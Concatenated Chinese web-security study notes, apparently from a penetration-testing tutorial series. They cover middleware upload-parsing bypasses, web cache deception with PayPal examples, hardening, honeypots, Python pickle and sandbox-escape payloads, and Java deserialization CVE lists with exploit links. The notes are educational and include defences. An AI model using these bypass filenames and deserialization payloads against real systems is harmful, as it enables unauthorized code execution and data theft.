  1 | # WEB安全渗透测试基础知识（十一）
  2 | 
  3 | **3.14. 中间件漏洞**
  4 | 
  5 | 3.14.1. IIS
  6 | 
  7 | 3.14.1.1. IIS 6.0
  8 | - 后缀解析 /xx.asp;.jpg
  9 | - 目录解析 /xx.asp/xx.jpg (xx.asp目录下任意解析)
 10 | - 默认解析 xx.asa xx.cer xx.cdx
 11 | - PROPFIND 栈溢出漏洞
 12 | 
 13 | PUT漏洞 WebDAV任意文件上传
 14 | 
 15 | 3.14.1.2. IIS 7.0-7.5 / Nginx <= 0.8.37
 16 | 
 17 | 在Fast-CGI开启状态下，在文件路径后加上 /xx.php ，则 xx.jpg/xx.php 会被解析为php文件
 18 | 
 19 | 3.14.1.3. 其他
 20 | 在支持NTFS 8.3文件格式时，可利用短文件名猜解目录文件
 21 | 
 22 | 
 23 | ---
 24 | 3.14.2. Nginx
 25 | 
 26 | 3.14.2.1. Fast-CGI关闭
 27 | 
 28 | 在Fast-CGI关闭的情况下， Nginx 仍然存在解析漏洞：在文件路径(xx.jpg)后面加上 %00.php ， 即 xx.jpg%00.php 会被当做 php 文件来解析
 29 | 
 30 | 3.14.2.2. Fast-CGI开启
 31 | 
 32 | 在Fast-CGI开启状态下，在文件路径后加上 /xx.php ，则 xx.jpg/xx.php 会被解析为php文件
 33 | 
 34 | 3.14.2.3. CVE-2013-4547
 35 | 
 36 | "a.jpg\x20\x00.php"
 37 | 
 38 | 
 39 | ---
 40 | 3.14.3. Apache
 41 | 
 42 | 3.14.3.1. 后缀解析
 43 | 
 44 | test.php.x1.x2.x3 （ x1,x2,x3 为没有在 mime.types 文件中定义的文件类型）。Apache 将从右往左开始判断后缀， 若x3为非可识别后缀，则判断x2，直到找到可识别后缀为止，然后对可识别后缀进行解析
 45 | 
 46 | 3.14.3.2. .htaccess
 47 | 
 48 | 当AllowOverride被启用时，上传启用解析规则的.htaccess
 49 | 
 50 | 3.14.3.3. CVE-2017-15715
 51 | 
 52 | %0A绕过上传黑名单
 53 | 
 54 | 
 55 | ---
 56 | 3.14.4. lighttpd
 57 | 
 58 | xx.jpg/xx.php
 59 | 
 60 | 
 61 | ---
 62 | 3.14.5. Windows
 63 | 
 64 | Windows不允许空格和点以及一些特殊字符作为结尾，创建这样的文件会自动取出，所以可以使用 xx.php[空格] ， xx.php.， xx.php/， xx.php::$DATA 可以上传脚本文件
 65 | 
 66 | 
 67 | 
 68 | ---
 69 | 
 70 | **3.15. Web Cache欺骗攻击**
 71 | 
 72 | 3.15.1. 简介
 73 | 网站通常都会通过如CDN、负载均衡器、或者反向代理来实现Web缓存功能。通过缓存频繁访问的文件，降低服务器响应延迟。  
 74 | 
 75 | 例如，网站 htttp://www.example.com 配置了反向代理。对于那些包含用户个人信息的页面，如 http://www.example.com/home.php ，由于每个用户返回的内容有所不同，因此这类页面通常是动态生成，并不会在缓存服务器中进行缓存。通常缓存的主要是可公开访问的静态文件，如css文件、js文件、txt文件、图片等等。此外，很多最佳实践类的文章也建议，对于那些能公开访问的静态文件进行缓存，并且忽略HTTP缓存头。  
 76 | 
 77 | Web cache攻击类似于RPO相对路径重写攻击，都依赖于浏览器与服务器对URL的解析方式。当访问不存在的URL时，如 http://www.example.com/home.php/non-existent.css ，浏览器发送get请求，依赖于使用的技术与配置，服务器返回了页面 http://www.example.com/home.php 的内容，同时URL地址仍然是 http://www.example.com/home.php/non-existent.css，http头的内容也与直接访问 http://www.example.com/home.php 相同，cacheing header、content-type（此处为text/html）也相同。
 78 | 
 79 | 
 80 | ---
 81 | 3.15.3. 漏洞利用
 82 | 
 83 | 攻击者欺骗用户访问 http://www.example.com/home.php/logo.png?www.myhack58.com ,导致含有用户个人信息的页面被缓存，从而能被公开访问到。更严重的情况下，如果返回的内容包含session标识、安全问题的答案，或者csrf token。这样攻击者能接着获得这些信息，因为通常而言大部分网站静态资源都是公开可访问的。
 84 | 
 85 | 
 86 | ---
 87 | 3.15.4. 漏洞存在的条件
 88 | 
 89 | 漏洞要存在，至少需要满足下面两个条件：  
 90 | - web cache功能根据扩展进行保存，并忽略caching header;
 91 | - 当访问如 http://www.example.com/home.php/non-existent.css 不存在的页面，会返回 home.php 的内容。
 92 | 
 93 | 
 94 | ---
 95 | 3.15.5. 漏洞防御
 96 | 
 97 | 防御措施主要包括3点：  
 98 | - 设置缓存机制，仅仅缓存http caching header允许的文件，这能从根本上杜绝该问题;
 99 | - 如果缓存组件提供选项，设置为根据content-type进行缓存;
100 | - 访问 http://www.example.com/home.php/non-existent.css 这类不存在页面，不返回 home.php 的内容，而返回404或者302。
101 | 
102 | 
103 | ---
104 | 3.15.6. Web Cache欺骗攻击实例
105 | 
106 | 3.15.6.1. Paypal
107 | 
108 | Paypal在未修复之前，通过该攻击，可以获取的信息包括：用户姓名、账户金额、信用卡的最后4位数、交易数据、emaill地址等信息。受该攻击的部分页面包括：
109 | 
110 | https://www.paypal.com/myaccount/home/attack.css
111 | https://www.paypal.com/myaccount/settings/notifications/attack.css
112 | https://history.paypal.com/cgi-bin/webscr/attack.css?cmd=_history-details
113 | 
114 | 


--------------------------------------------------------------------------------
/WEB安全渗透测试基础知识（十七）.md:
--------------------------------------------------------------------------------
  1 | # WEB安全渗透测试基础知识（十七）
  2 | 
  3 | 
  4 | **威胁情报**
  5 | 
  6 | 6.3.1. 简介
  7 | 
  8 | 威胁情报(Threat Intelligence)一般指从安全数据中提炼的，与网络空间威胁相关的信息，包括威胁来源、攻击意图、攻击手法、攻击目标信息，以及可用于解决威胁或应对危害的知识。广义的威胁情报也包括情报的加工生产、分析应用及协同共享机制。相关的概念有资产、威胁、脆弱性等，具体定义如下。
  9 | 
 10 | 6.3.2. 相关概念
 11 | 
 12 | 
 13 | ```
 14 | 资产(Asset):对组织具有价值的信息或资源
 15 | 威胁(Threat): 能够通过未授权访问、毁坏、揭露、数据修改和或拒绝服务对系统造成潜在危害的起因，威胁可由威胁的主体（威胁源）、能力、资源、动机、途径、可能性和后果等多种属性来刻画
 16 | 脆弱性 / 漏洞(Vulnerability): 可能被威胁如攻击者利用的资产或若干资产薄弱环节
 17 | 风险(Risk): 威胁利用资产或一组资产的脆弱性对组织机构造成伤害的潜在可能
 18 | 安全事件(Event): 威胁利用资产的脆弱性后实际产生危害的情景
 19 | ```
 20 | 
 21 | 6.3.3. 其他
 22 | 
 23 | 一般威胁情报需要包含威胁源、攻击目的、攻击对象、攻击手法、漏洞、攻击特征、防御措施等。威胁情报在事前可以起到预警的作用，在威胁发生时可以协助进行检测和响应，在事后可以用于分析和溯源。 
 24 | 
 25 | 常见的网络威胁情报服务有黑客或欺诈团体分析、社会媒体和开源信息监控、定向漏洞研究、定制的人工分析、实时事件通知、凭据恢复、事故调查、伪造域名检测等。
 26 | 
 27 | 为了实现情报的同步和交换，各组织都制定了相应的标准和规范。主要有国标，美国联邦政府标准等。  
 28 | 在威胁情报方面，比较有代表性的厂商有RSA、IBM、McAfee、赛门铁克、FireEye等。
 29 | 
 30 | **风险控制**
 31 | 
 32 | 6.4.1. 常见风险
 33 | - 会员
 34 | 撞库盗号
 35 | 账号分享
 36 | 批量注册
 37 | - 视频
 38 | 盗播盗看
 39 | 广告屏蔽
 40 | 刷量作弊
 41 | - 活动
 42 | 薅羊毛
 43 | - 直播
 44 | 挂站人气
 45 | 恶意图文
 46 | - 电商
 47 | 恶意下单
 48 | 订单欺诈
 49 | - 支付
 50 | 盗号盗卡
 51 | 洗钱
 52 | 恶意下单
 53 | 恶意提现
 54 | - 其他
 55 | 钓鱼邮件
 56 | 恶意爆破
 57 | 短信轰炸
 58 | 
 59 | ---
 60 | **安全加固**
 61 | 6.5.1. 网络设备
 62 | 
 63 | ```
 64 | 及时检查系统版本号
 65 | 敏感服务设置访问IP/MAC白名单
 66 | 开启权限分级控制
 67 | 关闭不必要的服务
 68 | 打开操作日志
 69 | 配置异常告警
 70 | 关闭ICMP回应
 71 | ```
 72 | 
 73 | ---
 74 | 6.5.2. 操作系统
 75 | 
 76 | 6.5.2.1. Linux
 77 | 
 78 | - 无用用户/用户组检查
 79 | - 敏感文件权限配置
 80 | 
 81 | ```
 82 | /etc/passwd
 83 | /etc/shadow
 84 | ~/.ssh/
 85 | /var/log/messages
 86 | /var/log/secure
 87 | /var/log/maillog
 88 | /var/log/cron
 89 | /var/log/spooler
 90 | /var/log/boot.log
 91 | ```
 92 | 
 93 | - 日志是否打开
 94 | - 及时安装补丁
 95 | - 开机自启
 96 | /etc/init.d
 97 | - 检查系统时钟
 98 | 
 99 | 6.5.2.2. Windows
100 | - 异常进程监控
101 | - 异常启动项监控
102 | - 异常服务监控
103 | - 配置系统日志
104 | - 用户账户
105 | 设置口令有效期
106 | 设置口令强度限制
107 | 设置口令重试次数
108 | - 安装EMET
109 | - 启用PowerShell日志
110 | - 限制以下敏感文件的下载和执行
111 | ade, adp, ani, bas, bat, chm, cmd, com, cpl, crt, hlp, ht, hta, inf, ins, isp, job, js, jse, lnk, mda, mdb, mde, mdz, msc, msi, msp, mst, pcd, pif, reg, scr, sct, shs, url, vb, vbe, vbs, wsc, wsf, wsh, exe, pif
112 | - 限制会调起wscript的后缀
113 | bat, js, jse, vbe, vbs, wsf, wsh
114 | 
115 | ---
116 | 6.5.3. 应用
117 | 
118 | 6.5.3.1. FTP
119 | 
120 | 禁止匿名登录
121 | 
122 | 修改Banner
123 | 6.5.3.2. SSH
124 | 
125 | 是否禁用ROOT登录
126 | 
127 | 是否禁用密码连接
128 | 
129 | 6.5.3.3. MySQL
130 | 
131 | ```
132 | 文件写权限设置
133 | 用户授权表管理
134 | 日志是否启用
135 | 版本是否最新
136 | ```
137 | 6.5.4. Web中间件
138 | 
139 | 6.5.4.1. Apache
140 | 
141 | 
142 | ```
143 | 版本号隐藏
144 | 版本是否最新
145 | 禁用部分HTTP动词
146 | 关闭Trace
147 | 禁止 server-status
148 | 上传文件大小限制
149 | 目录权限设置
150 | 是否允许路由重写
151 | 是否允许列目录
152 | 日志配置
153 | 配置超时时间防DoS
154 | ```
155 | 
156 | 6.5.4.2. Nginx
157 | 
158 | - 禁用部分HTTP动词
159 | - 禁用目录遍历
160 | - 检查重定向配置
161 | - 配置超时时间防DoS
162 | 
163 | 6.5.4.3. IIS
164 | 
165 | ```
166 | 版本是否最新
167 | 日志配置
168 | 用户口令配置
169 | ASP.NET功能配置
170 | 配置超时时间防DoS
171 | ```
172 | 
173 | 6.5.4.4. JBoss
174 | 
175 | jmx console配置
176 | 
177 | web console配置
178 | 6.5.4.5. Tomcat
179 | 
180 | ```
181 | 禁用部分HTTP动词
182 | 禁止列目录
183 | 禁止manager功能
184 | 用户密码配置
185 | 用户权限配置
186 | 配置超时时间防DoS
187 | ```
188 | 
189 | ---
190 | **蜜罐技术**
191 | 
192 | 6.6.1. 简介
193 | 
194 | 蜜罐是对攻击者的欺骗技术，用以监视、检测、分析和溯源攻击行为，其没有业务上的用途，所有流入/流出蜜罐的流量都预示着扫描或者攻击行为，因此可以比较好的聚焦于攻击流量。  
195 | 
196 | 蜜罐可以实现对攻击者的主动诱捕，能够详细地记录攻击者攻击过程中的许多痕迹，可以收集到大量有价值的数据，如病毒或蠕虫的源码、黑客的操作等，从而便于提供丰富的溯源数据。  
197 | 
198 | 但是蜜罐存在安全隐患，如果没有做好隔离，可能成为新的攻击源。
199 | 
200 | 6.6.2. 分类
201 | 
202 | 按用途分类，蜜罐可以分为研究型蜜罐和产品型蜜罐。研究型蜜罐一般是用于研究各类网络威胁，寻找应对的方式，不增加特定组织的安全性。产品型蜜罐主要是用于防护的商业产品。  
203 | 
204 | 按交互方式分类，蜜罐可以分为低交互蜜罐和高交互蜜罐。低交互蜜罐模拟网络服务响应和攻击者交互，容易部署和控制攻击，但是模拟能力会相对较弱，对攻击的捕获能力不强。高交互蜜罐
205 | 
206 | 6.6.3. 隐藏技术
207 | 
208 | 蜜罐主要涉及到的是伪装技术，主要涉及到进程隐藏、服务伪装等技术。  
209 | 
210 | 蜜罐之间的隐藏，要求蜜罐之间相互隐蔽。进程隐藏，蜜罐需要隐藏监控、信息收集等进程。伪服务和命令技术，需要对部分服务进行伪装，防止攻击者获取敏感信息或者入侵控制内核。数据文件伪装，需要生成合理的虚假数据的文件。
211 | 
212 | 6.6.4. 识别技术
213 | 
214 | 攻击者也会尝试对蜜罐进行识别。比较容易的识别的是低交互的蜜罐，尝试一些比较复杂且少见的操作能比较容易的识别低交互的蜜罐。相对困难的是高交互蜜罐的识别，因为高交互蜜罐通常以真实系统为基础来构建，和真实系统比较近似。对这种情况，通常会基于虚拟文件系统和注册表的信息、内存分配特征、硬件特征、特殊指令等来识别。


--------------------------------------------------------------------------------
/WEB安全渗透测试基础知识（十三）.md:
--------------------------------------------------------------------------------
  1 | # WEB安全渗透测试基础知识（十三）
  2 | 
  3 | **Python**
  4 | 
  5 | 4.2.1. 格式化字符串
  6 | 在Python中，有两种格式化字符串的方式，在Python2的较低版本中，格式化字符串的方式为 "this is a %s" % "test" ，之后增加了format的方式， 语法为 "this is a {}".format('test') 或者 "this is a {test}".format(test='test')
  7 | 
  8 | 当格式化字符串由用户输入时，则可能会造成一些问题，下面是一个最简单的例子
  9 | 
 10 | 
 11 | ```
 12 | >>> 'class of {0} is {0.__class__}'.format(42) 
 13 | "class of 42 is <class 'int'>"
 14 | ```
 15 | 
 16 | 
 17 | 从上面这个简单的例子不难知道，当我们可以控制要format的字符串时，则可以使用 __init__ / __globals__ 等属性读取一些比较敏感的值，甚至任意执行代码。
 18 | 
 19 | ---
 20 | 4.2.2. 反序列化
 21 | 
 22 | 4.2.2.1. pickle
 23 | 
 24 | 
 25 | ```
 26 | >>> class A(object): 
 27 | ...         a = 1 
 28 | ...         b = 2 
 29 | ...       def __reduce__(self): 
 30 | ...   return (subprocess.Popen, (('cmd.exe',),)) 
 31 | ... 
 32 | >>>   cPickle.dumps(A()) 
 33 | "csubprocess\nPopen\np1\n((S'cmd.exe'\np2\ntp3\ntp4\nRp5\n."
 34 | ```
 35 | 
 36 | 
 37 | 4.2.2.2. 其他
 38 | - PyYAML
 39 | - marshal
 40 | - shelve
 41 | 
 42 | 
 43 | ---
 44 | 4.2.3. 沙箱
 45 | 
 46 | 4.2.3.1. 常用函数
 47 | - eval / exec / compile
 48 | - dir / type
 49 | - globals / locals / vars
 50 | - getattr / setattr
 51 | 
 52 | 4.2.3.2. 绕过
 53 | 
 54 | 最简单的思路是在已有的模块中import，如果那个模块中已经 import 可以利用的模块就可以使用了
 55 | 在父类中寻找可用的模块，最常见payload是 
 56 | ```
 57 | ().__class__.__bases__[0].__subclasses__() 或者用魔术方法获取全局作用域 __init__.__func__.__globals__
 58 | ```
 59 | 
 60 | 
 61 | 有些网站没有过滤 pickle 模块，可以使用 pickle 实现任意代码执行，生成 payload 可以使用 https://gist.github.com/freddyb/3360650
 62 | 有的沙箱把相关的模块代码都被删除了，则可以使用libc中的函数，Python 中调用一般可以使用 ctypes 或者 cffi。
 63 | 
 64 | "A""B" == "AB"
 65 | 
 66 | 4.2.3.3. 防御
 67 | 
 68 | - Python官方给出了一些防御的建议  
 69 | - 使用Jython并尝试使用Java平台来锁定程序的权限
 70 | - 使用fakeroot来避免
 71 | - 使用一些rootjail的技术
 72 | 
 73 | ---
 74 | 4.2.4. 框架
 75 | 
 76 | 4.2.4.1. Django
 77 | 
 78 | 4.2.4.1.1. 历史漏洞
 79 | - CVE-2016-7401 CSRF Bypass
 80 | - CVE-2017-7233/7234 Open redirect vulnerability
 81 | - CVE-2017-12794 debug page XSS
 82 | 
 83 | 4.2.4.1.2. 配置相关
 84 | 
 85 | - Nginx 在为 Django 做反向代理时，静态文件目录配置错误会导致源码泄露。访问 /static.. 会 301 重定向到 /static../
 86 | 
 87 | 4.2.4.2. Flask
 88 | 
 89 | Flask默认使用客户端session，使得session可以被伪造
 90 | 
 91 | 
 92 | ---
 93 | 4.2.5. 危险函数 / 模块列表
 94 | 
 95 | 4.2.5.1. 命令执行
 96 | 
 97 | 
 98 | ```
 99 | os.popen
100 | os.system
101 | os.spawn
102 | os.fork
103 | os.exec
104 | popen2
105 | commands
106 | subprocess
107 | exec
108 | execfile
109 | eval
110 | timeit.sys
111 | timeit.timeit
112 | platform.os
113 | platform.sys
114 | platform.
115 | popen
116 | pty.spawn
117 | pty.os
118 | bdb.os
119 | cgi.sys
120 | …
121 | ```
122 | 4.2.5.2. 危险第三方库
123 | - Template
124 | - subprocess32
125 | 
126 | 4.2.5.3. 反序列化
127 | - marshal
128 | - PyYAML
129 | - pickle
130 | - cPickle
131 | - shelve
132 | - PIL
133 | 
134 | ---
135 | **Java*
136 | 4.3.1. 基本概念
137 | 
138 | JVM是Java平台的核心，以机器代码来实现，为程序执行提供了所需的所有基本功能，例如字节码解析器、JIT编译器、垃圾收集器等。由于它是机器代码实现的，其同样受到二进制文件受到的攻击。  
139 | 
140 | JCL是JVM自带的一个标准库，含有数百个系统类。默认情况下，所有系统类都是可信任的，且拥有所有的特权。
141 | 
142 | 4.3.1.2. JNDI
143 | 
144 | JNDI（Java Naming and Directory Interface，JAVA命名和目录接口）是为JAVA应用程序提供命名和目录访问服务的API（Application Programing Interface，应用程序编程接口）。
145 | 
146 | 4.3.1.3. OGNL
147 | 
148 | OGNL（Object-Graph Navigation Language，对象导航语言）是一种功能强大的表达式语言，通过简单一致的表达式语法，提供了存取对象的任意属性、调用对象的方法、遍历整个对象的结构图、实现字段类型转化等功能。  
149 | 
150 | Struts2中使用了OGNL，提供了一个ValueStack类。ValueStack分为root和context两部分。root中是当前的action对象，context中是ActionContext里面所有的内容。
151 | 
152 | 4.3.1.4. RMI
153 | 
154 | RMI（Remote Method Invocation，远程方法调用）能够让在客户端Java虚拟机上的对象像调用本地对象一样调用服务端java虚拟机中的对象上的方法。  
155 | 
156 | RMI远程调用步骤：  
157 | - 客户调用客户端辅助对象stub上的方法
158 | - - 客户端辅助对象stub打包调用信息（变量，方法名），通过网络发送给服务端辅助对象skeleton
159 | - 服务端辅助对象skeleton将客户端辅助对象发送来的信息解包，找出真正被调用的方法以及该方法所在对象
160 | - 调用真正服务对象上的真正方法，并将结果返回给服务端辅助对象skeleton
161 | - 服务端辅助对象将结果打包，发送给客户端辅助对象stub
162 | - 客户端辅助对象将返回值解包，返回给调用者
163 | - 客户获得返回值
164 | 
165 | ---
166 | 4.3.2. 框架
167 | 
168 | 4.3.2.1. Servlet
169 | 
170 | 4.3.2.1.1. 简介
171 | 
172 | Servlet（Server Applet）是Java Servlet的简称，称为小服务程序或服务连接器，是用Java编写的服务器端程序，主要功能在于交互式地浏览和修改数据，生成动态Web内容。  
173 | 
174 | 狭义的Servlet是指Java语言实现的一个接口，广义的Servlet是指任何实现了这个Servlet接口的类，一般情况下，人们将Servlet理解为后者。Servlet运行于支持Java的应用服务器中。从原理上讲，Servlet可以响应任何类型的请求，但绝大多数情况下Servlet只用来扩展基于HTTP协议的Web服务器。
175 | 
176 | 4.3.2.1.2. 生命周期为
177 | - 客户端请求该 Servlet
178 | - 加载 Servlet 类到内存
179 | - 实例化并调用init()方法初始化该
180 | - Servlet service()（根据请求方法不同调用 doGet() / doPost() / … / destroy()
181 | 
182 | 4.3.2.1.3. 接口
183 | 
184 | init()  
185 | 
186 | 在 Servlet 的生命期中，仅执行一次 init() 方法，在服务器装入 Servlet 时执行。  
187 | 
188 | service()  
189 | 
190 | service() 方法是 Servlet
191 | 的核心。每当一个客户请求一个HttpServlet对象，该对象的 service() 方法就要被调用，而且传递给这个方法一个”请求”(ServletRequest)对象和一个”响应”(ServletResponse)对象作为参数。
192 | 
193 | 4.3.2.2. Struts 2
194 | 
195 | 4.3.2.2.1. 简介
196 | 
197 | Struts2是一个基于MVC设计模式的Web应用框架，它本质上相当于一个servlet，在MVC设计模式中，Struts2作为控制器(Controller)来建立模型与视图的数据交互。
198 | 
199 | 4.3.2.2.2. 请求流程
200 | 
201 | ```
202 | 客户端发送请求的tomcat服务器
203 | 请求经过一系列过滤器
204 | FilterDispatcher调用ActionMapper来决定这个请求是否要调用某个Action
205 | ActionMppaer决定调用某个ActionFilterDispatcher把请求给ActionProxy
206 | ActionProxy通过Configuration Manager查看structs.xml，找到对应的Action类
207 | ActionProxy创建一个ActionInvocation对象
208 | ActionInvocation对象回调Action的execute方法
209 | Action执行完毕后，ActionInvocation根据返回的字符串，找到相应的result，通过HttpServletResponse返回给服务器
210 | ```
211 | 
212 | 4.3.2.2.3. 相关CVE
213 | 
214 | ```
215 | CVE-2016-3081 (S2-032)
216 | CVE-2016-3687 (S2-033)
217 | CVE-2016-4438 (S2-037)
218 | CVE-2017-5638
219 | CVE-2017-7672
220 | CVE-2017-9787
221 | CVE-2017-9793
222 | CVE-2017-9804
223 | CVE-2017-9805
224 | CVE-2017-12611
225 | CVE-2017-15707
226 | CVE-2018-1327
227 | CVE-2018-11776
228 | ```
229 | 
230 | 4.3.2.3. Spring MVC
231 | 
232 | 4.3.2.3.1. 请求流程
233 | 
234 | 
235 | ```
236 | 用户发送请求给服务器
237 | 服务器收到请求，使用DispatchServlet处理
238 | Dispatch使用HandleMapping检查url是否有对应的Controller，如果有，执行
239 | 如果Controller返回字符串，ViewResolver将字符串转换成相应的视图对象
240 | DispatchServlet将视图对象中的数据，输出给服务器 服务器将
241 | 数据输出给客户端
242 | ```
243 | 
244 | ---
245 | 4.3.3. 容器
246 | 
247 | 常见的Java服务器有Tomcat、Weblogic、JBoss、GlassFish、Jetty、Resin、IBM Websphere等，这里对部分框架做一个简单的说明。
248 | 
249 | 4.3.3.1. Tomcat
250 | Tomcat是一个轻量级应用服务器，在中小型系统和并发访问用户不是很多的场合下被普遍使用，用于开发和调试JSP程序。  
251 | 在收到请求后，Tomcat的处理流程如下：  
252 | 
253 | ```
254 | 客户端访问Web服务器，发送HTTP请求
255 | Web服务器接收到请求后，传递给Servlet容器
256 | Servlet容器加载Servlet，产生Servlet实例后，向其传递表示请求和响应的对象
257 | Servlet实例使用请求对象得到客户端的请求信息，然后进行相应的处理
258 | Servlet实例将处理结果通过响应对象发送回客户端，容器负责确保响应正确送出，同时将控制返回给Web服务器 
259 | Tomcat服务器是由一系列可配置的组件构成的，其中核心组件是Catalina Servlet容器，它是所有其他Tomcat组件的顶层容器。
260 | ```
261 | 
262 | 4.3.3.1.1. 相关CVE
263 | 
264 | 
265 | ```
266 | CVE-2019-0232
267 | https://github.com/pyn3rd/CVE-2019-0232/
268 | CVE-2017-12615
269 | https://mp.weixin.qq.com/s?__biz=MzI1NDg4MTIxMw==&mid=2247483659&idx=1&sn=c23b3a3b3b43d70999bdbe644e79f7e5
270 | CVE-2013-2067
271 | CVE-2012-4534
272 | CVE-2012-4431
273 | CVE-2012-3546
274 | CVE-2012-3544
275 | CVE-2012-2733
276 | CVE-2011-3375
277 | CVE-2011-3190
278 | CVE-2008-2938
279 | ```
280 | 
281 | 4.3.3.2. Weblogic
282 | 
283 | 4.3.3.2.1. 简介
284 | 
285 | WebLogic是美国Oracle公司出品的一个Application Server，是一个基于Java EE架构的中间件，WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。其将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。  
286 | 
287 | WebLogic对业内多种标准的全面支持，包括EJB、JSP、Servlet、JMS、JDBC等。
288 | 
289 | 4.3.3.2.2. 相关CVE
290 | 
291 | ```
292 | CVE-2019-2658
293 | CVE-2019-2650
294 | CVE-2019-2649
295 | CVE-2019-2648
296 | CVE-2019-2647
297 | CVE-2019-2646
298 | CVE-2019-2645
299 | CVE-2019-2618
300 | https://github.com/jas502n/cve-2019-2618/
301 | CVE-2019-2615
302 | CVE-2019-2568
303 | CVE-2018-3252
304 | CVE-2018-3248
305 | CVE-2018-3245
306 | CVE-2018-3201
307 | CVE-2018-3197
308 | CVE-2018-3191
309 | https://github.com/voidfyoo/CVE-2018-3191
310 | https://github.com/Libraggbond/CVE-2018-3191
311 | CVE-2018-2894
312 | https://xz.aliyun.com/t/2458
313 | CVE-2018-2628 https://mp.weixin.qq.com/s/nYY4zg2m2xsqT0GXa9pMGA
314 | CVE-2018-1258
315 | CVE-2017-10271
316 | http://webcache.googleusercontent.com/search?q=cache%3AsH7j8TF8uOIJ%3Awww.freebuf.com%2Fvuls%2F160367.html
317 | CVE-2017-3248
318 | CVE-2016-3510
319 | CVE-2015-4852
320 | https://github.com/roo7break/serialator
321 | ```
322 | 
323 | 4.3.3.3. JBoss
324 | 
325 | 4.3.3.3.1. 简介
326 | 
327 | JBoss是一个基于J2EE的管理EJB的容器和服务器，但JBoss核心服务不包括支持servlet/JSP的WEB容器，一般与Tomcat或Jetty绑定使用。
328 | 
329 | 4.3.3.3.2. 相关CVE
330 | 
331 | 
332 | ```
333 | CVE-2017-12149
334 | ```
335 | 
336 | ---
337 | 4.3.4. 沙箱
338 | 
339 | 4.3.4.1. 简介
340 | 
341 | Java实现了一套沙箱环境，使远程的非可信代码只能在受限的环境下执行。
342 | 
343 | 4.3.4.2. 相关CVE
344 | 
345 | ```
346 | CVE-2012-0507
347 | CVE-2012-4681
348 | CVE-2017-3272
349 | CVE-2017-3289
350 | ```
351 | 4.3.5. 反序列化
352 | 
353 | 4.3.5.1. 简介
354 | 
355 | 序列化就是把对象转换成字节流，便于保存在内存、文件、数据库中；反序列化即逆过程，由字节流还原成对象。Java中的 ObjectOutputStream 类的 writeObject() 方法可以实现序列化，类 ObjectInputStream类的readObject() 方法用于反序列化。  
356 | 
357 | 如果要实现类的反序列化，则是对其实现 Serializable 接口。
358 | 
359 | 4.3.5.2. 序列数据结构
360 | 
361 | 0xaced 魔术头
362 | 
363 | 4.3.5.3. 序列化流程
364 | 
365 | 
366 | ```
367 | ObjectOutputStream实例初始化时，将魔术头和版本号写入bout （BlockDataOutputStream类型） 中
368 | 调用ObjectOutputStream.writeObject()开始写对象数据
369 | ○ObjectStreamClass.lookup()封装待序列化的类描述 （返回ObjectStreamClass类型） ，获取包括类名、自定义serialVersionUID、可序列化字段 （返回ObjectStreamField类型） 和构造方法，以及writeObject、readObject方法等
370 | ○writeOrdinaryObject()写入对象数据
371 | ■写入对象类型标识
372 | ■writeClassDesc()进入分支writeNonProxyDesc()写入类描述数据
373 | 写入类描述符标识
374 | 写入类名
375 | 写入SUID （当SUID为空时，会进行计算并赋值）
376 | 计算并写入序列化属性标志位
377 | 写入字段信息数据
378 | 写入Block Data结束标识
379 | 写入父类描述数据
380 | ■writeSerialData()写入对象的序列化数据
381 | 若类自定义了writeObject()，则调用该方法写对象，否则调用defaultWriteFields()写入对象的字段数据 （若是非原始类型，则递归处理子对象）
382 | ```
383 | 
384 | 4.3.5.4. 反序列化流程
385 | 
386 | 
387 | ```
388 | ObjectInputStream实例初始化时，读取魔术头和版本号进行校验
389 | 调用ObjectInputStream.readObject()开始读对象数据
390 | ○读取对象类型标识
391 | ○readOrdinaryObject()读取数据对象
392 | ■readClassDesc()读取类描述数据
393 | 读取类描述符标识，进入分支readNonProxyDesc()
394 | 读取类名
395 | 读取SUID
396 | 读取并分解序列化属性标志位
397 | 读取字段信息数据
398 | resolveClass()根据类名获取待反序列化的类的Class对象，如果获取失败，则抛出ClassNotFoundException
399 | skipCustomData()循环读取字节直到Block Data结束标识为止 读取父类描述数据
400 | initNonProxy()中判断对象与本地对象的SUID和类名 （不含包名） 是否相同，若不同，则抛出InvalidClassException
401 | ObjectStreamClass.newInstance()获取并调用离对象最近的非■Serializable的父类的无参构造方法 （若不存在，则返回null） 创建对象实例
402 | ■readSerialData()读取对象的序列化数据
403 | 若类自定义了readObject()，则调用该方法读对象，否则调用defaultReadFields()读取并填充对象的字段数据
404 | ```
405 | 
406 | 4.3.5.5. 相关函数
407 | 
408 | 
409 | ```
410 | ObjectInputStream.readObject
411 | ObjectInputStream.readUnshared
412 | XMLDecoder.readObject
413 | Yaml.load
414 | XStream.fromXML
415 | ObjectMapper.readValue
416 | JSON.parseObject
417 | ```
418 | 
419 | 4.3.5.6. 主流JSON库
420 | 
421 | 4.3.5.6.1. GSON
422 | 
423 | Gson默认只能反序列化基本类型，如果是复杂类型，需要程序员实现反序列化机制，相对比较安全。
424 | 
425 | 4.3.5.6.2. Jackson
426 | 
427 | 除非指明@jsonAutoDetect，Jackson不会反序列化非public属性。在防御时，可以不使用enableDefaultTyping方法。  
428 | 
429 | 相关CVE有  
430 | 
431 | ```
432 | CVE-2017-7525
433 | CVE-2017-15095
434 | ```
435 | 
436 | 4.3.5.6.3. Fastjson
437 | 
438 | 相关CVE有  
439 | 
440 | CVE-2017-18349
441 | 
442 | 4.3.5.7. 存在危险的基础库
443 | 
444 | ```
445 | commons-fileupload 1.3.1
446 | commons-io 2.4
447 | commons-collections 3.1
448 | commons-logging 1.2
449 | commons-beanutils 1.9.2
450 | org.slf4j:slf4j-api 1.7.21
451 | com.mchange:mchange-commons-java 0.2.11
452 | org.apache.commons:commons-collections 4.0
453 | com.mchange:c3p0 0.9.5.2
454 | org.beanshell:bsh 2.0b5
455 | org.codehaus.groovy:groovy 2.3.9
456 | org.springframework:spring-aop 4.1.4.RELEASE
457 | ```
458 | 
459 | 4.3.5.8. 漏洞修复和防护
460 | 
461 | 4.3.5.8.1. Hook resolveClass
462 | 
463 | 在使用 readObject() 反序列化时会调用 resolveClass 方法读取反序列化的类名，可以通过hook该方法来校验反序列化的类，一个Demo如下
464 | 
465 | ![image](https://note.youdao.com/yws/public/resource/2e5cf2591c66904f78df39f912277f6d/xmlnote/WEBRESOURCE217ed0022320aed798ece9390b3c765d/9458)
466 | 
467 | 以上的Demo就只允许序列化 SerialObject ，通过这种方式，就可以设置允许序列化的白名单
468 | 
469 | 4.3.5.8.2. ValidatingObjectInputStream
470 | 
